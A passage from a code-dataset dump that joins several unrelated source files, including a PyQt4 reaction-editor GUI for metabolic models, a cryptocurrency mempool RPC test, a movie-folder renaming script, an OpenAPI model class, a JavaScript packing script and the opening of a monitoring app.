self._Blower = 0.0
Id = str(self.txtId.toPlainText()).strip()
Name = str(self.txtNm.toPlainText()).strip()
if Id == 'NewReactionId':
print('\nWARNING: using default reaction id')
errorMsg = None
if Id == "":
errorMsg = 'Reaction ID must be specified.'
elif Id in self._rlist:
errorMsg = 'Reaction ID \"{}\" already exists.'.format(Id)
if errorMsg != None:
self.showErrorMessage(errorMsg)
self.NewReaction = None
return None
if self.tblSubRow == 0 and self.tblProdRow == 0:
self.showErrorMessage('At least one reagent must be defined.')
self.NewReaction = None
return None
#print('\nid=\"{}\"\nname=\"{}\"'.format(Id, Name))
# print self.tblSub.rowCount(), self.tblSubRow
# print self.tblProd.rowCount(), self.tblProdRow
Reag = {}
exReac = False
for s_ in range(self.tblSub.rowCount()):
coeff = -abs(float(self.tblSub.item(s_, 0).text()))
Sid = str(self.tblSub.item(s_, 1).text()).strip()
if Sid in self._flist:
exReac = True
Reag[Sid] = coeff
for p_ in range(self.tblProd.rowCount()):
coeff = abs(float(self.tblProd.item(p_, 0).text()))
Sid = str(self.tblProd.item(p_, 1).text()).strip()
if Sid in self._flist:
exReac = True
if Sid in Reag:
Reag[Sid] += coeff
else:
Reag[Sid] = coeff
for r_ in tuple(Reag):
if Reag[r_] == 0.0:
Reag.pop(r_)
print('removing zero coefficient reagent: {}'.format(r_))
self.NewReaction = {'reversible': reversible,
'id': Id,
'name': Name,
'is_exchange': exReac,
'is_balanced': self.ISBALANCED,
'reagents': Reag,
'upper_bound': self._Bupper,
'lower_bound': self._Blower
}
sub = ''
prod = ''
for r_ in Reag:
coeff = abs(Reag[r_])
if Reag[r_] < 0.0:
if coeff == 1.0:
sub += '%s + ' % (r_)
else:
sub += '{%s} %s + ' % (coeff, r_)
else:
if coeff == 1.0:
prod += '%s + ' % (r_)
else:
prod += '{%s} %s + ' % (coeff, r_)
if reversible:
eq = '%s\n\t%s\n%s' % (sub[:-3], '<==>', prod[:-2])
else:
eq = '%s\n\t%s\n%s' % (sub[:-3], '-->', prod[:-2])
#quit_msg = "Add reaction:\n\n{}\n\t{}\n{}".format(sub,rev,prod)
quit_msg = eq
reply = QtGui.QMessageBox.question(self, 'Do you want to add the reaction \"{}\" to the model?'.format(Id),
quit_msg, QtGui.QMessageBox.Yes, QtGui.QMessageBox.No)
if reply == QtGui.QMessageBox.Yes:
self.statusBar.showMessage('Reaction {} added to model'.format(Id))
print(self.NewReaction)
QtGui.qApp.quit()
else:
print('Try again')
self.NewReaction = None
def initUI(self):
# create labels
lblSub = QtGui.QLabel('Substrates')
lblSub.setAlignment(QtCore.Qt.AlignCenter)
lblProd = QtGui.QLabel('Products')
lblProd.setAlignment(QtCore.Qt.AlignCenter)
lblId = QtGui.QLabel('Reaction id')
lblId.setAlignment(QtCore.Qt.AlignCenter)
lblNm = QtGui.QLabel('Reaction name')
lblNm.setAlignment(QtCore.Qt.AlignCenter)
# create text boxes
self.txtId = QtGui.QTextEdit()
self.txtId.setMaximumHeight(25)
self.txtId.setText('NewReactionId')
self.txtNm = QtGui.QTextEdit()
self.txtNm.setMaximumHeight(25)
self.txtNm.setText('NewReactionName')
self.txtBal = QtGui.QTextEdit()
self.txtBal.setMaximumHeight(40)
# create static lists
self.lstSub = QtGui.QListWidget()
self.lstSub.setSelectionMode(self.lstSub.ExtendedSelection)
self.lstProd = QtGui.QListWidget()
self.lstProd.setSelectionMode(self.lstProd.ExtendedSelection)
# populate lists
cntr = 0
for m_ in self._mlist:
cntr += 1
name = 'None'
comp = 'None'
if m_ in self._ccdict:
comp = self._ccdict[m_]
if m_ in self._cndict:
name = self._cndict[m_]
item = QtGui.QListWidgetItem(m_)
item.setToolTip('{}\t{}'.format(name, comp))
if m_ in self._flist:
item.setForeground(self._fixColour)
self.lstSub.addItem(item.clone())
self.lstProd.addItem(item)
# if cntr == 20: break
# create buttons
self.btAddSub = QtGui.QPushButton('Add substrate(s)')
QtCore.QObject.connect(self.btAddSub, QtCore.SIGNAL('clicked()'), self.addSelectedSubstrates)
self.btAddProd = QtGui.QPushButton('Add product(s)')
QtCore.QObject.connect(self.btAddProd, QtCore.SIGNAL('clicked()'), self.addSelectedProducts)
self.btReverse = QtGui.QPushButton('Reversible')
self.btReverse.setCheckable(True)
self.btReverse.setChecked(True)
# create tables
self.tblSub = QtGui.QTableWidget()
self.tblSub.setSortingEnabled(True)
self.tblSub.insertColumn(0)
self.tblSub.insertColumn(1)
self.tblSub.setHorizontalHeaderLabels(QtCore.QStringList(('Coefficient', 'Metabolite')))
self.tblSub.verticalHeader().setVisible(False)
QtCore.QObject.connect(self.tblSub, QtCore.SIGNAL('cellChanged(int,int)'), self.checkBalance)
self.tblSubRow = 0
self.tblProd = QtGui.QTableWidget()
self.tblProd.setSortingEnabled(True)
self.tblProd.insertColumn(0)
self.tblProd.insertColumn(1)
self.tblProd.setHorizontalHeaderLabels(QtCore.QStringList(('Coefficient', 'Metabolite')))
self.tblProd.verticalHeader().setVisible(False)
self.tblProdRow = 0
QtCore.QObject.connect(self.tblProd, QtCore.SIGNAL('cellChanged(int,int)'), self.checkBalance)
self.tblBal = QtGui.QTableWidget()
self.tblBal.setMaximumHeight(150)
self.tblBal.insertRow(0)
self.tblBal.insertRow(1)
self.tblBal.insertRow(2)
self.tblBal.verticalHeader().setVisible(False)
self.tblBalCol = 0
# set up menu and status bar
menuBar = QtGui.QMenuBar()
exitAction = QtGui.QAction('&Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Exit and loose changes')
exitAction.triggered.connect(QtGui.qApp.quit)
addReAction = QtGui.QAction('&Add reaction and exit', self)
addReAction.setShortcut('Ctrl+A')
addReAction.setStatusTip('Add reaction to model and exit')
addReAction.triggered.connect(self.getNewReaction)
fileMenu = menuBar.addMenu('&Model')
fileMenu.addAction(exitAction)
fileMenu.addAction(addReAction)
subAddAction = QtGui.QAction('&Add', self)
subAddAction.triggered.connect(self.addSelectedSubstrates)
subDelAction = QtGui.QAction('&Delete selected', self)
subDelAction.triggered.connect(self.deleteSubstrates)
subDelAllAction = QtGui.QAction('&Delete all', self)
subDelAllAction.triggered.connect(self.deleteAllSubstrates)
subMenu = menuBar.addMenu('&Substrate')
subMenu.addAction(subAddAction)
subMenu.addAction(subDelAction)
subMenu.addAction(subDelAllAction)
prodAddAction = QtGui.QAction('&Add', self)
prodAddAction.triggered.connect(self.addSelectedProducts)
prodDelAction = QtGui.QAction('&Delete selected', self)
prodDelAction.triggered.connect(self.deleteProducts)
prodDelAllAction = QtGui.QAction('&Delete all', self)
prodDelAllAction.triggered.connect(self.deleteAllProducts)
prodMenu = menuBar.addMenu('&Product')
prodMenu.addAction(prodAddAction)
prodMenu.addAction(prodDelAction)
prodMenu.addAction(prodDelAllAction)
self.statusBar = QtGui.QStatusBar()
self.statusBar.showMessage('{} ready'.format('Model'))
# do layout
grid = QtGui.QGridLayout()
grid.setSpacing(10)
grid.addWidget(menuBar, 0, 0, 1, 2)
grid.addWidget(self.statusBar, 0, 2, 1, 2)
grid.addWidget(lblId, 1, 0)
grid.addWidget(self.txtId, 1, 1)
grid.addWidget(lblNm, 1, 2)
grid.addWidget(self.txtNm, 1, 3)
grid.addWidget(lblSub, 2, 0, 1, 2)
grid.addWidget(lblProd, 2, 2, 1, 2)
grid.addWidget(self.lstSub, 3, 0, 1, 2)
grid.addWidget(self.lstProd, 3, 2, 1, 2)
grid.addWidget(self.btAddSub, 4, 0)
grid.addWidget(self.btReverse, 4, 1, 1, 2)
grid.addWidget(self.btAddProd, 4, 3)
grid.addWidget(self.tblSub, 5, 0, 1, 2)
grid.addWidget(self.tblProd, 5, 2, 1, 2)
grid.addWidget(self.tblBal, 6, 0, 1, 4)
self.setLayout(grid)
self.setGeometry(self.mousePos.x() - 75, self.mousePos.y() - 75, 500, 640)
self.setWindowTitle('Reaction Creator')
self.show()
def createReaction(mod):
"""
Create a reaction using the graphical Reaction Creator
- *mod* a CBMPy model object
"""
cfdict = {}
cndict = {}
ccdict = {}
for s_ in mod.species:
cfdict[s_.getId()] = s_.getChemFormula()
cndict[s_.getId()] = s_.getName()
ccdict[s_.getId()] = s_.compartment
app = QtGui.QApplication([])
ex = ReactionCreator(mod.getReactionIds(), mod.getSpeciesIds(), mod.getBoundarySpeciesIds(), cfdict, cndict, ccdict)
app.exec_()
newR = ex.NewReaction
del app, ex
if newR == None:
return None
else:
R = CBMReaction(newR['id'], name=newR['name'], reversible=newR['reversible'])
R.is_balanced = newR['is_balanced']
R.is_exchange = newR['is_exchange']
for r_ in newR['reagents']:
R.createReagent(r_, newR['reagents'][r_])
mod.getSpecies(r_).setReagentOf(newR['id'])
mod.addReaction(R, create_default_bounds=False)
mod.createReactionLowerBound(newR['id'], newR['lower_bound'])
mod.createReactionUpperBound(newR['id'], newR['upper_bound'])
return R
class CBFileDialogue(QtGui.QWidget):
_appTitle = 'Open file'
work_dir = None
model_file = None
mode = None
def __init__(self, work_dir, mode='open', filters=None):
super(CBFileDialogue, self).__init__()
self.mousePos = self.cursor().pos()
self.work_dir = work_dir
self.mode = mode
if mode == 'save':
self._appTitle = 'Save file'
self.initUI()
def initUI(self):
#self.setAttribute(QtCore.Qt.WA_DeleteOnClose, True)
# self.setHidden(True)
self.__dlg__ = QtGui.QFileDialog(self)
if self.mode == 'open':
#self.model_file = str(self.__dlg__.getOpenFileName(self, 'Open file', self.work_dir, options=QtGui.QFileDialog.DontUseNativeDialog))
self.model_file = str(self.__dlg__.getOpenFileName(self, 'Open file', self.work_dir))
elif self.mode == 'save':
#self.model_file = str(self.__dlg__.getSaveFileName(self, 'Save file as', self.work_dir, options=QtGui.QFileDialog.DontUseNativeDialog))
self.model_file = str(self.__dlg__.getSaveFileName(self, 'Save file as', self.work_dir))
self.model_file = os.path.normpath(self.model_file)
def fileDialogue(work_dir=None, mode='open', filters=None):
if work_dir == None:
work_dir = os.getcwd()
if mode in ['open', 'save']:
app = QtGui.QApplication([])
fileApp = CBFileDialogue(work_dir, mode=mode, filters=filters)
model_file = fileApp.model_file
fileApp.__dlg__.done(1)
app.exit()
if mode == 'open':
return model_file
else:
return True
class ViewSVG(QtGui.QWidget):
_fixColour = None
_errColour = None
_goodColour = None
_appTitle = 'ViewSVG'
def __init__(self, filename):
super(ViewSVG, self).__init__()
self.mousePos = self.cursor().pos()
self._fixColour = QtGui.QColor(0, 0, 153, alpha=255)
self._errColour = QtGui.QColor(255, 0, 0, alpha=255)
self._goodColour = QtGui.QColor(0, 100, 0, alpha=255)
self.filename = os.path.abspath(filename)
print('\nViewing file: {}'.format(filename))
self.initUI()
def initUI(self):
# create panels
self.txtId = QtGui.QTextEdit()
# set up menu and status bar
menuBar = QtGui.QMenuBar()
exitAction = QtGui.QAction('&Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Exit and loose changes')
exitAction.triggered.connect(QtGui.qApp.quit)
fileMenu = menuBar.addMenu('&File')
fileMenu.addAction(exitAction)
self.statusBar = QtGui.QStatusBar()
self.statusBar.showMessage('Ready ...')
# webkit panel
scene = QtGui.QGraphicsScene()
view = QtGui.QGraphicsView(scene)
br = QtSvg.QGraphicsSvgItem(self.filename).boundingRect()
webview = QGraphicsWebView()
# webview.load(QtCore.QUrl("C:\your_interactive_svg.svg"))
webview.load(QtCore.QUrl(QtCore.QUrl.fromLocalFile(self.filename)))
webview.setFlags(QtGui.QGraphicsItem.ItemClipsToShape)
webview.setCacheMode(QtGui.QGraphicsItem.NoCache)
webview.resize(br.width(), br.height())
scene.addItem(webview)
view.resize(br.width() + 10, br.height() + 10)
# view.show()
# do layout
grid = QtGui.QGridLayout()
grid.setSpacing(10)
grid.addWidget(menuBar, 0, 0, 1, 2)
#grid.addWidget(self.txtId, 1, 0, 1, 2)
grid.addWidget(view, 1, 0, 4, 4)
grid.addWidget(self.statusBar, 5, 0, 1, 4)
self.setLayout(grid)
self.setGeometry(self.mousePos.x() - 75, self.mousePos.y() - 75, 500, 640)
self.setWindowTitle(self._appTitle)
self.show()
def loadViewSVG(filename):
app = QtGui.QApplication([])
ex = ViewSVG(filename)
app.exec_()
class ValueSlider(QtGui.QWidget):
_fixColour = None
_errColour = None
_goodColour = None
_appTitle = 'ValueSlider'
def __init__(self):
super(ValueSlider, self).__init__()
self.mousePos = self.cursor().pos()
self._fixColour = QtGui.QColor(0, 0, 153, alpha=255)
self._errColour = QtGui.QColor(255, 0, 0, alpha=255)
self._goodColour = QtGui.QColor(0, 100, 0, alpha=255)
self.initUI()
def initUI(self):
# create panels
#self.txtId = QtGui.QTextEdit()
l1a = QtGui.QLabel(self)
l1a.setText('Property')
sld1 = QtGui.QSlider(QtCore.Qt.Horizontal, self)
sld1.setTickPosition(sld1.TicksBelow)
sld1_min = -100
sld1_max = 100
sld1.setMinimum(sld1_min)
sld1.setMaximum(sld1_max)
sld1.setTickInterval((sld1_min - sld1_max) / 10.0)
sld1.setSingleStep(0.1)
sld1.setFocusPolicy(QtCore.Qt.NoFocus)
sld1.valueChanged[int].connect(self.changeValue)
self.l1b = QtGui.QLabel(self)
self.l1b.setText('0.0')
# do layout
grid = QtGui.QGridLayout()
grid.setSpacing(10)
grid.addWidget(l1a, 0, 0, 1, 1)
grid.addWidget(self.l1b, 0, 1, 1, 1)
grid.addWidget(sld1, 0, 2, 1, 5)
#grid.addWidget(self.txtId, 1, 0, 1, 2)
#grid.addWidget(menuBar, 0, 0)
#grid.addWidget(self.statusBar, 0, 1)
self.setLayout(grid)
self.setGeometry(self.mousePos.x() - 75, self.mousePos.y() - 75, 280, 170)
self.setWindowTitle(self._appTitle)
self.show()
def changeValue(self, value):
getattr(self, 'l1b').setText('{}'.format(value))
def loadSlider():
app = QtGui.QApplication([])
ex = ValueSlider()
app.exec_()
data = "<DATASTART><return>{}</return>"
if __name__ == '__main__':
print(os.sys.argv)
if os.sys.argv[1] == 'fileOpen':
filename = fileDialogue(work_dir=None, mode='open', filters=None)
print(data.format(filename))
os.sys.exit(0)
# subprocess.check_output(['python', '_qtloader.py', 'fileOpen']).split('<DATASTART>')[1].strip()
# template widget
"""
class SmallAppBasicGrid(QtGui.QWidget):
_fixColour = None
_errColour = None
_goodColour = None
_appTitle = 'SmallAppBaseGrid'
def __init__(self):
super(SmallAppBasicGrid, self).__init__()
self.mousePos = self.cursor().pos()
self._fixColour = QtGui.QColor(0,0,153,alpha=255)
self._errColour = QtGui.QColor(255,0,0,alpha=255)
self._goodColour = QtGui.QColor(0,100,0,alpha=255)
self.initUI()
def initUI(self):
# create panels
self.txtId = QtGui.QTextEdit()
# set up menu and status bar
menuBar = QtGui.QMenuBar()
exitAction = QtGui.QAction('&Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Exit and loose changes')
exitAction.triggered.connect(QtGui.qApp.quit)
fileMenu = menuBar.addMenu('&File')
fileMenu.addAction(exitAction)
self.statusBar = QtGui.QStatusBar()
self.statusBar.showMessage('Ready ...')
# do layout
grid = QtGui.QGridLayout()
grid.setSpacing(10)
grid.addWidget(menuBar, 0, 0, 1, 2)
grid.addWidget(self.txtId, 1, 0, 1, 2)
grid.addWidget(self.statusBar, 2, 0, 1, 2)
self.setLayout(grid)
self.setGeometry(self.mousePos.x()-75, self.mousePos.y()-75, 500, 640)
self.setWindowTitle(self._appTitle)
self.show()
def loadBasicApp(mod):
app = QtGui.QApplication([])
ex = SmallAppBasicGrid()
app.exec_()
"""
# template microGUI
"""
class MicroGUI(QtGui.QWidget):
_appTitle = 'MicroGUI'
def __init__(self):
super(MicroGUI, self).__init__()
self.mousePos = self.cursor().pos()
self.work_dir = work_dir
self.initUI()
def initUI(self):
self.setAttribute(QtCore.Qt.WA_DeleteOnClose, True)
self.setHidden(True)
# action code (this example is for opening a file dialogue)
self.model_file = str(QtGui.QFileDialog.getOpenFileName(self, 'Open file', os.getcwd()))
def loadMicroGUI(*args):
app = QtGui.QApplication([])
mGUI = OpenFileDialogue()
appTitle = mGUI._appTitle
del mGUI, app
return
"""
"""
import sys
from PyQt4 import QtCore, QtGui, QtSvg
from PyQt4.QtWebKit import QGraphicsWebView
if __name__ == "__main__":
app = QtGui.QApplication(sys.argv)
scene = QtGui.QGraphicsScene()
view = QtGui.QGraphicsView(scene)
br = QtSvg.QGraphicsSvgItem("C:\your_interactive_svg.svg").boundingRect()
webview = QGraphicsWebView()
webview.load(QtCore.QUrl("C:\your_interactive_svg.svg"))
webview.load(QtCore.QUrl(QtCore.QUrl.fromLocalFile("C:\your_interactive_svg.svg")))
webview.setFlags(QtGui.QGraphicsItem.ItemClipsToShape)
webview.setCacheMode(QtGui.QGraphicsItem.NoCache)
webview.resize(br.width(), br.height())
scene.addItem(webview)
view.resize(br.width()+10, br.height()+10)
view.show()
sys.exit(app.exec_())
"""
| gpl-3.0 | 6,245,848,769,703,354,000 | 35.823864 | 148 | 0.568523 | false |
presidentielcoin/presidentielcoin | qa/rpc-tests/mempool_spendcoinbase.py | 1 | 2498 | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Presidentielcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test spending coinbase transactions.
# The coinbase transaction in block N can appear in block
# N+100... so is valid in the mempool when the best block
# height is N+99.
# This test makes sure coinbase spends that will be mature
# in the next block are accepted into the memory pool,
# but less mature coinbase spends are NOT.
#
from test_framework.test_framework import PresidentielcoinTestFramework
from test_framework.util import *
# Create one-input, one-output, no-fee transaction:
class MempoolSpendCoinbaseTest(PresidentielcoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 1
self.setup_clean_chain = False
def setup_network(self):
# Just need one node for this test
args = ["-checkmempool", "-debug=mempool"]
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, args))
self.is_network_split = False
def run_test(self):
chain_height = self.nodes[0].getblockcount()
assert_equal(chain_height, 200)
node0_address = self.nodes[0].getnewaddress()
# Coinbase at height chain_height-100+1 ok in mempool, should
# get mined. Coinbase at height chain_height-100+2 is
# is too immature to spend.
b = [ self.nodes[0].getblockhash(n) for n in range(101, 103) ]
coinbase_txids = [ self.nodes[0].getblock(h)['tx'][0] for h in b ]
spends_raw = [ create_tx(self.nodes[0], txid, node0_address, 49.99) for txid in coinbase_txids ]
spend_101_id = self.nodes[0].sendrawtransaction(spends_raw[0])
# coinbase at height 102 should be too immature to spend
assert_raises(JSONRPCException, self.nodes[0].sendrawtransaction, spends_raw[1])
# mempool should have just spend_101:
assert_equal(self.nodes[0].getrawmempool(), [ spend_101_id ])
# mine a block, spend_101 should get confirmed
self.nodes[0].generate(1)
assert_equal(set(self.nodes[0].getrawmempool()), set())
# ... and now height 102 can be spent:
spend_102_id = self.nodes[0].sendrawtransaction(spends_raw[1])
assert_equal(self.nodes[0].getrawmempool(), [ spend_102_id ])
if __name__ == '__main__':
MempoolSpendCoinbaseTest().main()
| mit | 8,169,746,611,444,227,000 | 38.650794 | 104 | 0.670937 | false |
hgibs/cinefiles | src/cinefiles/cinefolders.py | 1 | 6051 | #! /usr/bin/env python3
import logging
import shutil
from shutil import copy2, move
from os import path, scandir, makedirs
import os
from sys import maxsize
from guessit import guessit
import configparser
from .cinefiles import Cinefiles
# from guessit import guessit
#
# defaultPath = "/Volumes/Holland Gibson Ext HDD/Movies/Movies"
# path = input("What folder contains the movies you want to rename/place
# in folders?\n("+defaultPath+"): ")
class Cinefolders:
def __init__(self, *args, **kwargs):
self.configdict = { 'configfile':'',
'dirpath':'',
'srcpath':'',
'copy':True,
'limit':maxsize,
}
for k in kwargs:
if k not in self.configdict:
print(k+" isn't a valid key")
if('configfile' in kwargs):
self.configdict.update({'configfile':kwargs['configfile']})
self.readconfigs(kwargs['configfile'])
elif(len(kwargs)==0):
defaultconfig = 'cinefiles.ini'
print("No arguments specified, searching for "+defaultconfig)
self.configdict.update({'configfile':defaultconfig})
self.readconfigs(defaultconfig)
else:
if('folder' in kwargs):
self.configdict.update({'dirpath':kwargs['folder']})
def readconfigs(self, file):
config = configparser.ConfigParser()
if path.exists(file):
config.read(file)
else:
print('Config file not found!!')
exit()
if 'cinefolders' not in config:
print( "You must have a [cinefolders] section in the"
+"config file!!!")
exit()
conf = config['cinefolders']
folder = conf.get('mainfolder',fallback='')
self.configdict.update({'dirpath':folder})
srcfolder = conf.get('source_folder',fallback='')
self.configdict.update({'srcpath':srcfolder})
copy_flag = conf.getboolean('copy',fallback=True)
self.configdict.update({'copy':copy_flag})
numlimit = conf.getint('max_number',fallback=maxsize)
self.configdict.update({'limit':numlimit})
# print(self.configdict)
def organizefolder(self):
folder = self.configdict['dirpath']
self.moveintofolders(src=folder, copy=False)
# def renameexisting(self):
# folders = scandir(src)
# for item in folders:
# if(item.is_folder()):
# if(not item.name.startswith('.')):
#
def fixname(self, en):
i_info = guessit(en.name)
# newName = i_info['title'].lower()
name = i_info['title']
words = name.split(' ')
newName = ''
skips = ['a','an','the','and','but','or','for','nor','on','at',
'to','from','by']
punctuation = [',','?','!','.',';',':']
for w in words:
addpunctuation = ''
if(w[-1] in punctuation):
addpunctuation = w[-1]
w=w[:-1]
if(w.lower() not in skips):
newName += w.title()+' '+addpunctuation
#make sure first and last word is capitalized
words2 = newName.split(' ')
words2[0] = words2[0].title()
words2[-1] = words2[-1].title()
newName = ''
for w in words2:
newName += w+' '
newName = newName.strip()
if(newName[0:4].lower() == 'the '):
newName = newName[4:]
newName += ', The '
# newName = newName.title()
if('year' in i_info):
year = str(i_info['year'])
newName = newName.strip()+' ('+year+')'
return newName
def moveintofolders(self,src=None, limit=None, copy=None):
if(src==None):
src=self.configdict['srcpath']
if(limit==None):
limit=self.configdict['limit']
if(copy==None):
copy=self.configdict['copy']
dirpath = self.configdict['dirpath']
# print(dirpath)
if not path.exists(dirpath):
raise NotADirectoryError(dirpath+" does not exist")
# fixedpath = path.replace('\\','').rstrip()
list = scandir(src)
num = 0
same_folder = (src==dirpath)
# if(not copy and not same_folder):
# confirmtxt = ""
# while(not (confirmtxt=="yes" or confirmtxt=="no")):
# confirmtxt = input(
# "I highly reccomend you copy movies first, if you "
# +"don't want an error to delete or corrupt your "
# +"movies. Are you sure you want to proceed with "
# +"moving movies into folders? (yes or no) ")
# confirmtxt = confirmtxt.lower()
# if(not (confirmtxt=="yes" or confirmtxt=="no")):
# print("Please enter 'yes' or 'no'")
for item in list:
if(item.is_file() and num<=limit):
if(not item.name.startswith('.')):
newName = self.fixname(item)
print('Copying to '+newName)
logging.info(newName)
if(not os.path.exists(dirpath+'/'+newName)):
makedirs(dirpath+'/'+newName)
if(copy):
copy2(item.path, dirpath+'/'+newName+'/'+item.name)
else:
move(item.path, dirpath+'/'+newName+'/'+item.name)
num+=1
if(copy):
returnstmt = str(num)+" movies copied into better-named folders."
else:
returnstmt = str(num)+" movies moved into better-named folders."
print(returnstmt)
| apache-2.0 | -6,665,234,963,519,729,000 | 33.386364 | 77 | 0.497273 | false |
Telestream/telestream-cloud-python-sdk | telestream_cloud_qc_sdk/telestream_cloud_qc/models/framesize_test.py | 1 | 5637 | # coding: utf-8
"""
Qc API
Qc API # noqa: E501
The version of the OpenAPI document: 3.0.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from telestream_cloud_qc.configuration import Configuration
class FramesizeTest(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'horizontal_size': 'int',
'vertical_size': 'int',
'reject_on_error': 'bool',
'checked': 'bool'
}
attribute_map = {
'horizontal_size': 'horizontal_size',
'vertical_size': 'vertical_size',
'reject_on_error': 'reject_on_error',
'checked': 'checked'
}
def __init__(self, horizontal_size=None, vertical_size=None, reject_on_error=None, checked=None, local_vars_configuration=None): # noqa: E501
"""FramesizeTest - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._horizontal_size = None
self._vertical_size = None
self._reject_on_error = None
self._checked = None
self.discriminator = None
if horizontal_size is not None:
self.horizontal_size = horizontal_size
if vertical_size is not None:
self.vertical_size = vertical_size
if reject_on_error is not None:
self.reject_on_error = reject_on_error
if checked is not None:
self.checked = checked
@property
def horizontal_size(self):
"""Gets the horizontal_size of this FramesizeTest. # noqa: E501
:return: The horizontal_size of this FramesizeTest. # noqa: E501
:rtype: int
"""
return self._horizontal_size
@horizontal_size.setter
def horizontal_size(self, horizontal_size):
"""Sets the horizontal_size of this FramesizeTest.
:param horizontal_size: The horizontal_size of this FramesizeTest. # noqa: E501
:type: int
"""
self._horizontal_size = horizontal_size
@property
def vertical_size(self):
"""Gets the vertical_size of this FramesizeTest. # noqa: E501
:return: The vertical_size of this FramesizeTest. # noqa: E501
:rtype: int
"""
return self._vertical_size
@vertical_size.setter
def vertical_size(self, vertical_size):
"""Sets the vertical_size of this FramesizeTest.
:param vertical_size: The vertical_size of this FramesizeTest. # noqa: E501
:type: int
"""
self._vertical_size = vertical_size
@property
def reject_on_error(self):
"""Gets the reject_on_error of this FramesizeTest. # noqa: E501
:return: The reject_on_error of this FramesizeTest. # noqa: E501
:rtype: bool
"""
return self._reject_on_error
@reject_on_error.setter
def reject_on_error(self, reject_on_error):
"""Sets the reject_on_error of this FramesizeTest.
:param reject_on_error: The reject_on_error of this FramesizeTest. # noqa: E501
:type: bool
"""
self._reject_on_error = reject_on_error
@property
def checked(self):
"""Gets the checked of this FramesizeTest. # noqa: E501
:return: The checked of this FramesizeTest. # noqa: E501
:rtype: bool
"""
return self._checked
@checked.setter
def checked(self, checked):
"""Sets the checked of this FramesizeTest.
:param checked: The checked of this FramesizeTest. # noqa: E501
:type: bool
"""
self._checked = checked
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, FramesizeTest):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, FramesizeTest):
return True
return self.to_dict() != other.to_dict()
| mit | -44,024,424,667,962,370 | 27.326633 | 146 | 0.576903 | false |
mikel-egana-aranguren/SADI-Galaxy-Docker | galaxy-dist/static/scripts/pack_scripts.py | 1 | 1952 | #!/usr/bin/env python
import sys, os
from glob import glob
from subprocess import call
from shutil import copyfile
from os import path
# Scripts that should not be packed -- just copied
do_not_pack = set()
cmd = "java -jar ../../scripts/yuicompressor.jar --charset utf-8 --type js %(fname)s -o packed/%(fname)s"
# cmd = "java -jar ../../scripts/compiler.jar --compilation_level SIMPLE_OPTIMIZATIONS --js %(fname)s --js_output_file packed/%(fname)s"
# If specific scripts specified on command line, just pack them, otherwise pack
# all.
def recursive_glob( pattern, excluded_dirs ):
"""
Returns all items that match pattern in root and subdirectories.
"""
a_dir, a_pattern = path.split( pattern )
# Skip excluded dirs.
if a_dir in excluded_dirs:
return []
# Search current dir.
# print a_dir, a_pattern
rval = glob( pattern )
for item in glob( path.join( a_dir, "*" ) ):
if path.isdir( item ):
rval.extend( recursive_glob( path.join( item, a_pattern ), excluded_dirs ) )
return rval
# Get files to pack.
if len( sys.argv ) > 1:
to_pack = sys.argv[1:]
else:
to_pack = recursive_glob( "*.js", [ "packed" ] )
for fname in to_pack:
d = dict( fname=fname )
packed_fname = path.join( 'packed', fname )
# Only copy if full version is newer than packed version.
if path.exists( packed_fname ) and ( path.getmtime( fname ) < path.getmtime( packed_fname ) ):
print "Packed is current: %s" % fname
continue
print "%(fname)s --> packed/%(fname)s" % d
# Create destination dir if necessary.
dir, name = os.path.split( packed_fname )
if not path.exists( dir ):
print "Creating needed directory %s" % dir
os.makedirs( dir )
# Copy/pack.
if fname in do_not_pack:
copyfile( fname, path.join( packed_fname ) )
else:
out = call( cmd % d, shell=True )
| gpl-3.0 | -941,269,120,476,930,600 | 28.134328 | 136 | 0.618852 | false |
Skydes/Monitoring | src/main.py | 1 | 2622 | #!/usr/bin/env python
'''
Copyright (c) 2016, Paul-Edouard Sarlin
All rights reserved.
Project: Autonomous Monitoring System
File: main.py
Date: 2016-08-08
Author: Paul-Edouard Sarlin
Website: https://github.com/skydes/monitoring
'''
from multiprocessing import Queue, Lock
from Queue import Empty
from rocket import Rocket
from threading import Thread
import signal
import time
import cv2
import json
import logging, logging.handlers
from capture import Capture
from processing import Processing
from cloud import Dropbox
from server import *
QUEUE_MAXSIZE = 10
PORT = 8000
# Setup logging
logFormatter = logging.Formatter(fmt='%(levelname)-8s %(module)-15s %(asctime)-20s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
rootLogger = logging.getLogger()
rootLogger.setLevel(logging.INFO)
fileHandler = logging.handlers.RotatingFileHandler("./log/app.log", maxBytes=30000, backupCount=5)
fileHandler.setFormatter(logFormatter)
rootLogger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
rootLogger.addHandler(consoleHandler)
# Setup configuration
with open("conf.json") as json_file:
app.conf.update(json.load(json_file))
# Initialize and configure threads
